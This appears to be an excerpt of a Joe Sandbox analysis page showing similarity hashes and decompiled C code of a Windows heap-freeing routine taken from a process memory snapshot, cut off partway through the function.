Associated: 0000001B.00000002.1995499136.000000001F0B9000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 0000001B.00000002.1995678669.000000001F0BD000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_27_2_1ef90000_ieinstal.jbxd

Similarity

API ID:
String ID: $$.mui$.mun$SystemResources\
API String ID: 0-3047833772
Opcode ID: 9d834e83572919d3f936c44485f68bc73c5080a7c4eb5a2ea6b190c59682b767
Instruction ID: 32cd0f0586185c03163cb7a56ad131bd54e50c27bbbdaf52e0e285e428918ed2
Opcode Fuzzy Hash: 9d834e83572919d3f936c44485f68bc73c5080a7c4eb5a2ea6b190c59682b767
Instruction Fuzzy Hash: BF624B76B0036A8ECB24CF54CC50FD9B7B9BB0A310F5446EAD909A7A50D731AE85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1EFD3C60 Relevance: 5.4, Strings: 3, Instructions: 1603
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E1EFD3C60(signed char __ecx, signed int _a4, intOrPtr _a8) {
				signed short _v8;
				signed int _v12;
				char _v20;
				signed char _v32;
				signed int _v36;
				char _v37;
				char _v38;
				signed int _v44;
				signed short _v48;
				signed char _v52;
				signed char _v56;
				char _v60;
				short _v64;
				signed int _v72;
				signed short _v76;
				signed int _v80;
				signed int _v84;
				char _v85;
				char _v86;
				signed int _v92;
				signed int _v96;
				signed short _v100;
				signed short* _v104;
				signed char _v105;
				signed short _v108;
				signed short _v110;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed short _v128;
				signed short _v132;
				signed short _v136;
				signed int _v140;
				signed int _v144;
				signed short _v148;
				unsigned int _v152;
				signed short _v156;
				signed int _v160;
				signed int _v164;
				signed short _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v196;
				unsigned int* _v200;
				signed int _v204;
				signed int _v208;
				signed short _v212;
				signed char _v216;
				signed int _v224;
				signed int _v228;
				intOrPtr _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				intOrPtr _v264;
				unsigned int _v276;
				unsigned int _v284;
				signed short _v292;
				signed short _v300;
				signed int _v308;
				signed short _v316;
				signed short _v324;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t686;
				signed int _t692;
				signed char* _t693;
				signed char _t694;
				void* _t697;
				signed int _t700;
				char* _t701;
				signed int _t704;
				signed char* _t705;
				signed int _t706;
				signed char* _t707;
				signed int _t709;
				signed int _t712;
				signed char* _t713;
				intOrPtr _t722;
				signed int _t723;
				signed char* _t724;
				signed int _t738;
				signed int _t743;
				intOrPtr* _t760;
				signed char _t761;
				signed int* _t768;
				signed int _t777;
				signed int* _t778;
				signed int _t782;
				intOrPtr _t788;
				intOrPtr _t790;
				signed char _t798;
				intOrPtr _t801;
				signed short* _t802;
				signed int* _t805;
				unsigned int* _t812;
				signed int _t815;
				signed int _t817;
				signed int _t820;
				signed int _t842;
				signed char _t853;
				signed short _t854;
				void* _t855;
				signed short* _t858;
				signed int _t861;
				signed int _t865;
				intOrPtr _t871;
				signed int _t875;
				signed int _t878;
				signed int _t879;
				signed int _t880;
				signed char _t882;
				signed int _t884;
				signed char _t885;
				intOrPtr* _t897;
				intOrPtr* _t900;
				signed int _t903;
				intOrPtr _t909;
				signed int _t913;
				signed int _t919;
				signed int _t923;
				signed char _t930;
				intOrPtr* _t931;
				intOrPtr _t932;
				signed int _t935;
				signed int _t941;
				intOrPtr _t947;
				signed int _t951;
				signed int _t954;
				signed int _t955;
				signed char _t957;
				signed short _t959;
				signed char _t960;
				signed char _t961;
				unsigned int _t968;
				signed char _t970;
				signed int _t979;
				signed int _t980;
				signed char _t984;
				signed int _t986;
				signed int _t987;
				signed int _t988;
				signed int _t998;
				intOrPtr _t1009;
				void* _t1015;
				void* _t1018;
				signed int _t1019;
				signed int _t1020;
				signed short _t1023;
				signed int _t1025;
				signed short _t1026;
				signed int _t1027;
				unsigned int _t1030;
				signed short _t1033;
				signed int _t1034;
				unsigned int _t1038;
				signed char _t1045;
				signed char _t1047;
				signed int _t1050;
				signed short _t1051;
				signed int _t1053;
				intOrPtr _t1056;
				signed int _t1058;
				signed int _t1060;
				signed int _t1061;
				signed int _t1063;
				signed int _t1069;
				signed int _t1071;
				signed int _t1087;
				signed short* _t1088;
				intOrPtr _t1089;
				signed int _t1091;
				signed short _t1092;
				signed char _t1093;
				signed short _t1095;
				signed int _t1096;
				intOrPtr _t1097;
				intOrPtr* _t1110;
				intOrPtr _t1111;
				signed char _t1113;
				intOrPtr _t1114;
				signed int _t1119;
				signed char _t1124;
				signed int _t1131;
				signed int _t1132;
				intOrPtr _t1133;
				intOrPtr* _t1135;
				signed char _t1136;
				signed short _t1138;
				intOrPtr _t1140;
				signed int _t1146;
				signed int _t1150;
				signed short _t1152;
				signed int _t1154;
				signed int _t1160;
				signed char _t1164;
				signed char _t1166;
				intOrPtr _t1169;
				signed short* _t1173;
				signed char _t1175;
				signed int _t1176;
				signed int _t1177;
				signed int _t1187;
				signed int _t1188;
				void* _t1189;
				signed int _t1191;
				signed short _t1195;
				signed int _t1196;
				signed int _t1197;
				intOrPtr* _t1199;
				signed int* _t1202;
				intOrPtr _t1203;
				signed int _t1205;
				signed short _t1214;
				signed int _t1215;
				signed int _t1217;
				signed int _t1219;
				intOrPtr* _t1224;
				intOrPtr _t1226;
				signed int _t1228;
				unsigned int _t1232;
				signed int _t1238;
				signed int _t1239;
				signed int _t1240;
				unsigned int _t1242;
				signed short _t1247;
				signed int _t1249;
				unsigned int _t1252;
				intOrPtr* _t1255;
				signed int _t1257;
				unsigned int _t1267;
				signed int _t1270;
				signed char _t1271;
				signed int _t1274;
				signed int _t1275;
				signed int _t1286;
				signed char _t1287;
				signed int _t1288;
				void* _t1290;
				signed int _t1291;
				signed int _t1292;
				signed char _t1293;
				signed int _t1294;
				signed int _t1295;
				signed int _t1298;
				signed int _t1300;
				signed int _t1301;
				signed int _t1302;
				signed int _t1303;
				signed short* _t1304;
				signed short _t1305;
				signed int _t1308;
				signed int _t1309;
				intOrPtr _t1310;
				signed int _t1311;
				signed short _t1312;
				signed short _t1314;
				signed short _t1317;
				intOrPtr _t1318;
				signed int _t1319;
				signed int _t1322;
				void* _t1323;
				void* _t1324;
				void* _t1327;
				void* _t1328;

				_t1037 = __ecx;
				_push(0xfffffffe);
				_push(0x1f09c1a8);
				_push(E1F00AD20);
				_push( *[fs:0x0]);
				_t1324 = _t1323 - 0x130;
				_push(_t1018);
				_t686 =  *0x1f0bb370;
				_v12 = _v12 ^ _t686;
				_push(_t686 ^ _t1322);
				 *[fs:0x0] =  &_v20;
				_t1280 = __ecx;
				_v216 = __ecx;
				_v37 = 1;
				_v38 = 0;
				_v136 = 0;
				_v156 = 1;
				_v92 = 0;
				_v116 = 0;
				_v148 = 0;
				_v64 = 0;
				_t690 = _a4;
				if(__ecx != _a4) {
					_t1188 = _t1187 |  *(__ecx + 0x44);
					_v56 = _t1188;
					__eflags = _t1188 & 0x7d010f60;
					if((_t1188 & 0x7d010f60) == 0) {
						_t1285 = 3;
						L7:
						_t692 =  *( *[fs:0x30] + 0x50);
						__eflags = _t692;
						if(_t692 == 0) {
							L10:
							_t693 = 0x7ffe0380;
						} else {
							__eflags =  *_t692;
							if( *_t692 == 0) {
								goto L10;
							} else {
								_t693 =  *( *[fs:0x30] + 0x50) + 0x226;
							}
						}
						__eflags =  *_t693;
						if( *_t693 == 0) {
							L15:
							_t1019 = _a4;
						} else {
							_t1009 =  *[fs:0x30];
							__eflags =  *(_t1009 + 0x240) & 0x00000001;
							if(( *(_t1009 + 0x240) & 0x00000001) == 0) {
								goto L15;
							} else {
								_t1019 = _a4;
								_t1037 =  *(_t1280 + 0x4c) >> 0x00000011 &  *(_t1280 + 0x52) & 0x000000ff ^  *(_t1019 + 2) & 0x000000ff;
								__eflags = _t1037 & 0x00000008;
								if((_t1037 & 0x00000008) == 0) {
									_t1037 = _t1280;
									E1F07F247(_t1037, _a8, _t1285);
									_t1188 = _v56;
								}
							}
						}
						_v8 = 0;
						__eflags = _t1188 & 0x00000001;
						if(__eflags != 0) {
							__eflags =  *(_t1280 + 0x4c);
							if( *(_t1280 + 0x4c) != 0) {
								 *_t1019 =  *_t1019 ^  *(_t1280 + 0x50);
								__eflags =  *(_t1019 + 3) - ( *(_t1019 + 2) ^  *(_t1019 + 1) ^  *_t1019);
								if(__eflags != 0) {
									_push(_t1037);
									E1F07D646(_t1019, _t1280, _t1019, _t1280, _t1285, __eflags);
								}
							}
							L42:
							_t1286 = _t1019 + 2;
							_t694 =  *_t1286;
							__eflags = _t694 & 0x00000008;
							if((_t694 & 0x00000008) != 0) {
								_t988 = _t694 & 0x000000f7;
								__eflags = _t988;
								 *_t1286 = _t988;
							}
							__eflags =  *((char*)(_t1019 + 7)) - 4;
							if( *((char*)(_t1019 + 7)) == 4) {
								_t1020 = _t1019 + 0xffffffe8;
								_v92 = _t1020;
								_t1038 =  *(_t1020 + 0x10);
								_v152 = _t1038;
								_v116 = _t1020 & 0xffff0000;
								 *((intOrPtr*)(_t1280 + 0x200)) =  *((intOrPtr*)(_t1280 + 0x200)) - _t1038;
								_t697 =  *_t1020;
								_t1039 =  *(_t1020 + 4);
								_t1189 =  *_t1039;
								_t1287 =  *(_t697 + 4);
								__eflags = _t1189 - _t1287;
								if(_t1189 != _t1287) {
									L320:
									__eflags = 0;
									_t1039 = 0xd;
									E1F085FED(0xd, 0, _t1020, _t1287, _t1189, 0);
								} else {
									__eflags = _t1189 - _t1020;
									if(_t1189 != _t1020) {
										goto L320;
									} else {
										 *_t1039 = _t697;
										 *(_t697 + 4) = _t1039;
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t738 =  *( *[fs:0x30] + 0x68);
									_v260 = _t738;
									__eflags = _t738 & 0x00000800;
									if((_t738 & 0x00000800) != 0) {
										__eflags =  *(_t1020 + 0x10) >> 3;
										_t1039 = _t1280;
										E1F069AFE(_t1280,  *((intOrPtr*)(_v92 + 0xa)),  *(_t1020 + 0x10) >> 3, 0, 3);
									}
								}
								_t1288 = 0;
								_a4 = 0;
								__eflags = _v38;
								if(_v38 != 0) {
									_push( *(_t1280 + 0xc8));
									E1EFCE740(_t1039);
									_v38 = 0;
								}
								_t1021 =  *(_v92 + 0x14);
								_v148 =  *(_v92 + 0x14);
								_t700 = E1EFD3C40();
								__eflags = _t700;
								if(_t700 == 0) {
									_t701 = 0x7ffe0388;
								} else {
									_t701 =  *( *[fs:0x30] + 0x50) + 0x22e;
									_t1288 = _a4;
									_t1021 = _v148;
								}
								__eflags =  *_t701;
								if( *_t701 != 0) {
									E1F07DA30(_t1021, _t1280, _v116, _t1021);
								}
								_v48 = 0;
								_t1191 =  &_v116;
								_v264 = E1EFBFABA(_t1191,  &_v48, 0x8000);
								_t704 = E1EFD3C40();
								__eflags = _t704;
								if(_t704 == 0) {
									_t705 = 0x7ffe0380;
								} else {
									_t705 =  *( *[fs:0x30] + 0x50) + 0x226;
									_t1288 = _a4;
								}
								__eflags =  *_t705;
								if( *_t705 != 0) {
									_t722 =  *[fs:0x30];
									__eflags =  *(_t722 + 0x240) & 0x00000001;
									if(( *(_t722 + 0x240) & 0x00000001) != 0) {
										_t723 = E1EFD3C40();
										__eflags = _t723;
										if(_t723 == 0) {
											_t724 = 0x7ffe0380;
										} else {
											_t724 =  *( *[fs:0x30] + 0x50) + 0x226;
										}
										__eflags =  *(_t1280 + 0x74) << 3;
										_t1191 = _v92;
										E1F07F058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t724 & 0x000000ff);
									}
									_t1288 = _a4;
								}
								_t706 = E1EFD3C40();
								__eflags = _t706;
								if(_t706 == 0) {
									_t707 = 0x7ffe038a;
								} else {
									_t707 =  *( *[fs:0x30] + 0x50) + 0x230;
									_t1288 = _a4;
								}
								__eflags =  *_t707;
								if( *_t707 != 0) {
									_t712 = E1EFD3C40();
									__eflags = _t712;
									if(_t712 == 0) {
										_t713 = 0x7ffe038a;
									} else {
										_t713 =  *( *[fs:0x30] + 0x50) + 0x230;
										_t1288 = _a4;
									}
									__eflags =  *(_t1280 + 0x74) << 3;
									_t1191 = _v92;
									E1F07F058(_t1021, _t1280, _t1191,  *(_t1280 + 0x74) << 3, _v152,  *(_t1280 + 0x74) << 3, 0, 0,  *_t713 & 0x000000ff);
								}
								_t709 = _v48 >> 3;
								__eflags = _t709;
								_v212 = _t709;
								goto L350;
							} else {
								_t743 =  *_t1019 & 0x0000ffff;
								__eflags = _t743 -  *((intOrPtr*)(_t1280 + 0xf0));
								if(_t743 <  *((intOrPtr*)(_t1280 + 0xf0))) {
									_t1271 =  *((intOrPtr*)((_t743 >> 3) + _t1280 + 0xf2));
									_t984 = 1 << (_t743 & 0x00000007);
									_t1019 = _a4;
									__eflags = _t1271 & _t984;
									if((_t1271 & _t984) == 0) {
										_t1173 =  *((intOrPtr*)(_t1280 + 0xec)) + ( *_t1019 & 0x0000ffff) * 2;
										_t986 =  *_t1173 & 0x0000ffff;
										__eflags = _t986 - 1;
										if(_t986 > 1) {
											_t987 = _t986 - 1;
											__eflags = _t987;
											 *_t1173 = _t987;
										}
									}
								}
								__eflags = _v37;
								if(_v37 == 0) {
									_t979 =  *( *[fs:0x30] + 0x68);
									_v228 = _t979;
									_t1019 = _a4;
									__eflags = _t979 & 0x00000800;
									if((_t979 & 0x00000800) != 0) {
										_push(2);
										_push(0);
										__eflags =  *_t1286 & 0x00000002;
										if(( *_t1286 & 0x00000002) == 0) {
											_t1166 =  *(_t1019 + 3);
											_v105 = _t1166;
											_t980 =  *_t1019 & 0x0000ffff;
											_t1270 = _t1166 & 0x000000ff;
										} else {
											_t980 =  *_t1019 & 0x0000ffff;
											_t1169 = _t1019 - 8 + _t980 * 8;
											_v232 = _t1169;
											_t1270 =  *((intOrPtr*)(_t1169 + 2));
										}
										_push(_t980);
										_v64 = E1F069AFE(_t1280, _t1270);
									}
								}
								_t1195 =  *_t1019 & 0x0000ffff;
								_v48 = _t1195;
								_v212 = _t1195;
								__eflags =  *(_t1280 + 0x40) & 0x00000080;
								if(( *(_t1280 + 0x40) & 0x00000080) == 0) {
									_v60 = 0;
									_v176 = _t1019;
									_t1300 = _t1019 - (( *(_t1280 + 0x54) & 0x0000ffff ^  *(_t1019 + 4) & 0x0000ffff) << 3);
									_v44 = _t1300;
									__eflags = _t1300 - _t1019;
									if(_t1300 != _t1019) {
										_t1131 =  *(_t1280 + 0x4c);
										_t930 = _t1131 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1300 + 2);
										__eflags = _t930 & 0x00000001;
										if((_t930 & 0x00000001) == 0) {
											__eflags = _t1131;
											if(_t1131 != 0) {
												_t1267 =  *(_t1280 + 0x50) ^  *_t1300;
												 *_t1300 = _t1267;
												_t1164 = _t1267 >> 0x00000010 ^ _t1267 >> 0x00000008 ^ _t1267;
												__eflags = _t1267 >> 0x18 - _t1164;
												if(__eflags != 0) {
													_push(_t1164);
													E1F07D646(_t1019, _t1280, _t1300, _t1280, _t1300, __eflags);
												}
											}
											_t1255 = _t1300 + 8;
											_v104 = _t1255;
											_t1132 =  *_t1255;
											_v96 = _t1132;
											_t931 =  *((intOrPtr*)(_t1300 + 0xc));
											_v72 = _t931;
											_t932 =  *_t931;
											_t1133 =  *((intOrPtr*)(_t1132 + 4));
											__eflags = _t932 - _t1133;
											if(_t932 != _t1133) {
												L105:
												E1F085FED(0xd, _t1280, _t1255, _t1133, _t932, 0);
											} else {
												__eflags = _t932 - _t1255;
												if(_t932 != _t1255) {
													goto L105;
												} else {
													 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1300 & 0x0000ffff);
													_t1257 =  *(_t1280 + 0xb4);
													_v32 = _t1257;
													__eflags = _t1257;
													if(_t1257 != 0) {
														_t954 =  *_t1300 & 0x0000ffff;
														_v120 = _t954;
														while(1) {
															__eflags = _t954 -  *(_t1257 + 4);
															if(_t954 <  *(_t1257 + 4)) {
																break;
															}
															_t1160 =  *_t1257;
															__eflags = _t1160;
															if(_t1160 != 0) {
																_t1257 = _t1160;
																_v32 = _t1257;
																continue;
															} else {
																_t954 =  *(_t1257 + 4) - 1;
																__eflags = _t954;
															}
															break;
														}
														_v164 = _t954;
														_v52 = _t954;
														_t1146 = _t954 -  *((intOrPtr*)(_t1257 + 0x14));
														_v80 = _t1146;
														__eflags =  *(_t1257 + 8);
														_t955 = _t1146 + _t1146;
														if( *(_t1257 + 8) == 0) {
															_t955 = _t1146;
														}
														_t1311 = _t955 * 4;
														_v84 = _t1311;
														_t957 =  *((intOrPtr*)(_t1257 + 0x20)) + _t1311;
														_v56 = _t957;
														_v188 =  *_t957;
														 *((intOrPtr*)(_t1257 + 0xc)) =  *((intOrPtr*)(_t1257 + 0xc)) - 1;
														_t959 =  *(_t1257 + 4);
														_v36 = _t959;
														_t1312 = _t959 - 1;
														_v128 = _t1312;
														_t960 = _v52;
														__eflags = _t960 - _t1312;
														_t1300 = _v44;
														if(_t960 == _t1312) {
															_t168 = _t1257 + 0x10;
															 *_t168 =  *(_t1257 + 0x10) - 1;
															__eflags =  *_t168;
														}
														_t170 = _t1300 + 8; // 0x1f00ad28
														__eflags = _v188 - _t170;
														if(_v188 == _t170) {
															_v168 =  *(_t1257 + 4);
															__eflags =  *_t1257;
															if( *_t1257 == 0) {
																_t1317 = _v128;
																_v36 = _t1317;
																_v168 = _t1317;
															}
															_t1314 =  *_v104;
															_v104 =  *((intOrPtr*)(_t1257 + 0x18));
															__eflags = _t960 - _v36;
															_t1150 = _v80;
															if(_t960 >= _v36) {
																_t961 = _v56;
																__eflags = _t1314 - _v104;
																if(_t1314 == _v104) {
																	 *_t961 = 0;
																	goto L89;
																} else {
																	 *_t961 = _t1314;
																	goto L83;
																}
																goto L106;
															} else {
																__eflags = _t1314 -  *((intOrPtr*)(_t1257 + 0x18));
																if(_t1314 ==  *((intOrPtr*)(_t1257 + 0x18))) {
																	L88:
																	 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = 0;
																	L89:
																	 *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) =  *( *((intOrPtr*)(_v32 + 0x1c)) + (_t1150 >> 5) * 4) &  !(1 << (_t1150 & 0x0000001f));
																} else {
																	_t1152 =  *(_t1314 - 8);
																	_v276 = _t1152;
																	__eflags =  *(_t1280 + 0x4c);
																	if( *(_t1280 + 0x4c) != 0) {
																		_t968 =  *(_t1280 + 0x50) ^ _t1152;
																		_v36 = _t968;
																		_v276 = _t968;
																		_t970 = _v36;
																		__eflags = _t970 >> 0x18 - (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970);
																		if(_t970 >> 0x18 != (_t968 >> 0x00000010 ^ _t968 >> 0x00000008 ^ _t970)) {
																			E1F085FED(3, _t1280, _t1314 - 8, 0, 0, 0);
																			_t1257 = _v32;
																		}
																		_t1152 = _v36;
																	}
																	_t1154 = _v120 - (_t1152 & 0x0000ffff);
																	__eflags = _t1154;
																	_v236 = _t1154;
																	if(_t1154 != 0) {
																		_t1150 = _v80;
																		goto L88;
																	} else {
																		 *(_v84 +  *((intOrPtr*)(_t1257 + 0x20))) = _t1314;
																	}
																}
															}
															L83:
															_t1300 = _v44;
														}
													}
													_t935 = _v96;
													_t1135 = _v72;
													 *_t1135 = _t935;
													 *((intOrPtr*)(_t935 + 4)) = _t1135;
													__eflags =  *(_t1300 + 2) & 0x00000008;
													if(( *(_t1300 + 2) & 0x00000008) == 0) {
														L94:
														_t1136 =  *(_t1300 + 2);
														__eflags = _t1136 & 0x00000004;
														if((_t1136 & 0x00000004) != 0) {
															_t1034 = ( *_t1300 & 0x0000ffff) * 8 - 0x10;
															_v172 = _t1034;
															__eflags = _t1136 & 0x00000002;
															if((_t1136 & 0x00000002) != 0) {
																__eflags = _t1034 - 4;
																if(_t1034 > 4) {
																	_t1034 = _t1034 - 4;
																	__eflags = _t1034;
																	_v172 = _t1034;
																}
															}
															_t941 = E1F0180A0(_t1300 + 0x10, _t1034, 0xfeeefeee);
															_v72 = _t941;
															__eflags = _t941 - _t1034;
															if(_t941 != _t1034) {
																_t1140 =  *[fs:0x30];
																__eflags =  *(_t1140 + 0xc);
																if( *(_t1140 + 0xc) == 0) {
																	_push("HEAP: ");
																	E1EFBB910();
																	_t1328 = _t1324 + 4;
																} else {
																	E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	_t1328 = _t1324 + 8;
																}
																_push(_v72 + 0x10 + _t1300);
																E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1300);
																_t1324 = _t1328 + 0xc;
																_t947 =  *[fs:0x30];
																__eflags =  *((char*)(_t947 + 2));
																if( *((char*)(_t947 + 2)) != 0) {
																	 *0x1f0b47a1 = 1;
																	 *0x1f0b4100 = _t1300;
																	asm("int3");
																	 *0x1f0b47a1 = 0;
																}
															}
														}
														 *(_t1300 + 2) = 0;
														 *((char*)(_t1300 + 7)) = 0;
														_t1019 = _t1300;
														_v176 = _t1019;
														_t1138 = _v48 + ( *_t1300 & 0x0000ffff);
														_v48 = _t1138;
														 *_t1300 = _t1138;
														 *(_t1300 + 4 + _v48 * 8) =  *(_t1280 + 0x54) ^ _v48;
													} else {
														_t951 = E1EFBF5C7(_t1280, _t1300);
														__eflags = _t951;
														if(_t951 != 0) {
															goto L94;
														} else {
															E1EFBF113(_t1280, _t1300,  *_t1300 & 0x0000ffff, 1);
														}
													}
												}
											}
											L106:
											_t1195 = _v48;
										}
									}
									_t1286 = _t1019 + _t1195 * 8;
									_v36 = _t1286;
									__eflags =  *(_t1280 + 0x4c);
									if( *(_t1280 + 0x4c) == 0) {
										L111:
										_v86 = 1;
									} else {
										_t923 =  *_t1286;
										_v284 = _t923;
										_t1252 =  *(_t1280 + 0x50) ^ _t923;
										_v284 = _t1252;
										__eflags = _t1252 >> 0x18 - (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252);
										if(_t1252 >> 0x18 == (_t1252 >> 0x00000010 ^ _t1252 >> 0x00000008 ^ _t1252)) {
											_t1195 = _v48;
											goto L111;
										} else {
											_v86 = 0;
											E1F085FED(3, _t1280, _t1286, 0, 0, 0);
											_t1195 = _v48;
											while(1) {
												L112:
												_t1087 =  *(_t1280 + 0x4c);
												_t853 = _t1087 >> 0x00000014 &  *(_t1280 + 0x52) ^  *(_t1286 + 2);
												__eflags = _t853 & 0x00000001;
												if((_t853 & 0x00000001) != 0) {
													break;
												}
												__eflags = _t1087;
												if(_t1087 != 0) {
													_t1232 =  *(_t1280 + 0x50) ^  *_t1286;
													 *_t1286 = _t1232;
													_t1124 = _t1232 >> 0x00000010 ^ _t1232 >> 0x00000008 ^ _t1232;
													__eflags = _t1232 >> 0x18 - _t1124;
													if(__eflags != 0) {
														_push(_t1124);
														E1F07D646(_t1019, _t1280, _t1286, _t1280, _t1286, __eflags);
													}
												}
												__eflags = _v60;
												if(_v60 != 0) {
													_t897 = _t1019 + 8;
													_t1308 =  *_t897;
													_v72 = _t1308;
													_t1110 =  *((intOrPtr*)(_t1019 + 0xc));
													_v96 = _t1110;
													_t1111 =  *_t1110;
													_t1226 =  *((intOrPtr*)(_t1308 + 4));
													__eflags = _t1111 - _t1226;
													if(_t1111 != _t1226) {
														L139:
														E1F085FED(0xd, _t1280, _t897, _t1226, _t1111, 0);
													} else {
														__eflags = _t1111 - _t897;
														if(_t1111 != _t897) {
															goto L139;
														} else {
															 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1019 & 0x0000ffff);
															_t1228 =  *(_t1280 + 0xb4);
															__eflags = _t1228;
															if(_t1228 != 0) {
																_t1119 =  *_t1019 & 0x0000ffff;
																while(1) {
																	_t1310 =  *((intOrPtr*)(_t1228 + 4));
																	__eflags = _t1119 - _t1310;
																	if(_t1119 < _t1310) {
																		break;
																	}
																	_t919 =  *_t1228;
																	__eflags = _t919;
																	if(_t919 != 0) {
																		_t1228 = _t919;
																		continue;
																	} else {
																		_t1119 = _t1310 - 1;
																	}
																	break;
																}
																_v180 = _t1119;
																E1EFD036A(_t1280, _t1228, 1, _t1019 + 8, _t1119,  *_t1019 & 0x0000ffff);
																_t1308 = _v72;
															}
															_t900 = _v96;
															 *_t900 = _t1308;
															 *((intOrPtr*)(_t1308 + 4)) = _t900;
															__eflags =  *(_t1019 + 2) & 0x00000008;
															if(( *(_t1019 + 2) & 0x00000008) == 0) {
																L129:
																_t1113 =  *(_t1019 + 2);
																__eflags = _t1113 & 0x00000004;
																if((_t1113 & 0x00000004) != 0) {
																	_t1309 = ( *_t1019 & 0x0000ffff) * 8 - 0x10;
																	_v184 = _t1309;
																	__eflags = _t1113 & 0x00000002;
																	if((_t1113 & 0x00000002) != 0) {
																		__eflags = _t1309 - 4;
																		if(_t1309 > 4) {
																			_t1309 = _t1309 - 4;
																			__eflags = _t1309;
																			_v184 = _t1309;
																		}
																	}
																	_t903 = E1F0180A0(_t1019 + 0x10, _t1309, 0xfeeefeee);
																	_v72 = _t903;
																	__eflags = _t903 - _t1309;
																	if(_t903 != _t1309) {
																		_t1114 =  *[fs:0x30];
																		__eflags =  *(_t1114 + 0xc);
																		if( *(_t1114 + 0xc) == 0) {
																			_push("HEAP: ");
																			E1EFBB910();
																			_t1327 = _t1324 + 4;
																		} else {
																			E1EFBB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																			_t1327 = _t1324 + 8;
																		}
																		_push(_v72 + 0x10 + _t1019);
																		E1EFBB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t1019);
																		_t1324 = _t1327 + 0xc;
																		_t909 =  *[fs:0x30];
																		__eflags =  *((char*)(_t909 + 2));
																		if( *((char*)(_t909 + 2)) != 0) {
																			 *0x1f0b47a1 = 1;
																			 *0x1f0b4100 = _t1019;
																			asm("int3");
																			 *0x1f0b47a1 = 0;
																		}
																	}
																}
															} else {
																_t913 = E1EFBF5C7(_t1280, _t1019);
																__eflags = _t913;
																if(_t913 != 0) {
																	goto L129;
																} else {
																	E1EFBF113(_t1280, _t1019,  *_t1019 & 0x0000ffff, 1);
																}
															}
														}
													}
													_v60 = 0;
													_t1286 = _v36;
												}
												_t299 = _t1286 + 8; // 0x106
												_t1224 = _t299;
												_v72 = _t1224;
												_t1088 =  *_t1224;
												_v104 = _t1088;
												_t854 =  *(_t1286 + 0xc);
												_v128 = _t854;
												_t855 =  *_t854;
												_t1089 =  *((intOrPtr*)(_t1088 + 4));
												__eflags = _t855 - _t1089;
												if(_t855 != _t1089) {
													L191:
													E1F085FED(0xd, _t1280, _t1224, _t1089, _t855, 0);
													goto L192;
												} else {
													__eflags = _t855 - _t1224;
													if(_t855 != _t1224) {
														goto L191;
													} else {
														 *(_t1280 + 0x74) =  *(_t1280 + 0x74) - ( *_t1286 & 0x0000ffff);
														_t1091 =  *(_t1280 + 0xb4);
														_v32 = _t1091;
														__eflags = _t1091;
														if(_t1091 != 0) {
															_t878 =  *_t1286 & 0x0000ffff;
															_v80 = _t878;
															while(1) {
																_t1302 =  *(_t1091 + 4);
																__eflags = _t878 - _t1302;
																if(_t878 < _t1302) {
																	break;
																}
																_t879 =  *_t1091;
																__eflags = _t879;
																if(_t879 != 0) {
																	_t1091 = _t879;
																	_v32 = _t1091;
																	_t878 = _v80;
																	continue;
																} else {
																	_t1303 = _t1302 - 1;
																	__eflags = _t1303;
																	_v124 = _t1303;
																}
																L149:
																_v56 = _t1303;
																_t1238 = _t1303 -  *((intOrPtr*)(_t1091 + 0x14));
																_v44 = _t1238;
																__eflags =  *(_t1091 + 8);
																_t880 = _t1238 + _t1238;
																if( *(_t1091 + 8) == 0) {
																	_t880 = _t1238;
																}
																_t1239 = _t880 * 4;
																_v84 = _t1239;
																_t882 =  *((intOrPtr*)(_t1091 + 0x20)) + _t1239;
																_v52 = _t882;
																_v96 =  *_t882;
																 *((intOrPtr*)(_t1091 + 0xc)) =  *((intOrPtr*)(_t1091 + 0xc)) - 1;
																_t884 =  *(_t1091 + 4);
																_t1240 = _t884 - 1;
																_v120 = _t1240;
																__eflags = _t1303 - _t1240;
																if(_t1303 == _t1240) {
																	_t328 = _t1091 + 0x10;
																	 *_t328 =  *(_t1091 + 0x10) - 1;
																	__eflags =  *_t328;
																}
																_t1304 = _v72;
																__eflags = _v96 - _t1304;
																if(_v96 == _t1304) {
																	_v192 = _t884;
																	__eflags =  *_t1091;
																	if( *_t1091 == 0) {
																		_t884 = _v120;
																		_v192 = _t884;
																	}
																	_t1305 =  *_t1304;
																	_v72 =  *((intOrPtr*)(_t1091 + 0x18));
																	__eflags = _v56 - _t884;
																	_t1242 = _v44;
																	if(_v56 >= _t884) {
																		_t885 = _v52;
																		__eflags = _t1305 - _v72;
																		if(_t1305 == _v72) {
																			 *_t885 = 0;
																			goto L170;
																		} else {
																			 *_t885 = _t1305;
																			goto L164;
																		}
																		goto L187;
																	} else {
																		__eflags = _t1305 -  *((intOrPtr*)(_t1091 + 0x18));
																		if(_t1305 ==  *((intOrPtr*)(_t1091 + 0x18))) {
																			L169:
																			 *(_v84 +  *((intOrPtr*)(_t1091 + 0x20))) = 0;
																			L170:
																			_v44 = _t1242 & 0x0000001f;
